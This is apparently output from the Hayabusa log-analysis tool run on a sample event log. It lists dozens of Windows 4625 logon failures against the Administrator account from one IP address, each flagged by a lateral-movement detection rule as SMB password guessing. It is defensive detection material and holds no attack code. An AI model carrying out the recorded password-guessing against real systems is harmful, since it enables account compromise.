2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.328 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.836 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.354 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.927 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.432 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.951 
